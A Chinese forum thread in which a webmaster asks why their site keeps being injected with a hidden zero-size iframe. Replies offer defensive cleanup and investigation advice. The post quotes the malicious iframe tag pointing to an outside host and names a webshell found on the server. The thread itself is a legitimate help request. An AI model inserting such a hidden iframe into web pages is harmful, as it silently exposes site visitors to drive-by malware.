最近网站被黑了,被批量挂上此马:
<iframe src="http://ca.winvv.com/cn.htm" width=0 height=0></iframe>
我检查了上传漏洞和防注入后。就开始检查全部网站文件清马,查出了几个网马文件叫做“十三 WebShell VIP 终结版”,删除了那几个马,应该是没有了。但是平均每隔两天,就又被批量挂一次马。
我现在只能自己也生成了一个“十三 WebShell VIP 终结版”,用批量清马来清除,但是每隔两天又被挂一次,我又再去清一次,这样下去也不是办法啊。不知那个马到底藏在什么地方。我把整站文件下载下来用杀毒软件查,也查不到,用Dreamweaver的批量搜索文件夹,搜索关键字,也搜不到,实在没有可疑文件了,怎么还能挂我马呢??跪求高手们救救我吧,快要搞死我了!高分了
------解决方案--------------------
检查一下有没有上传漏洞?
还有其他的陌生文件
估计有后门
------解决方案--------------------
嗯
<iframe src="http://ca.winvv.com/cn.htm" width=0 height=0> </iframe> 你清除了
最好全站检察下代码
在杀下毒
估计你网站有注入漏动.
------解决方案--------------------
用ultraedit查找替换下<iframe src="http://ca.winvv.com/cn.htm" width=0 height=0> </iframe> 为空
帮网页改为只读
------解决方案--------------------
服务器如果是自己的就考虑是否被别人安装了后门,有可能需要重新安装操作系统。
如果不是自己的服务器则和服务器提供商联系。
------解决方案--------------------
假如是真的生不如死,那就死掉算了,关掉网站,关门大吉
假如是想死马当活马医,还是可以去检查下程序漏洞,根据文件被篡改的时间检查iis日志文件附近时间的相关记录,分析相关问题.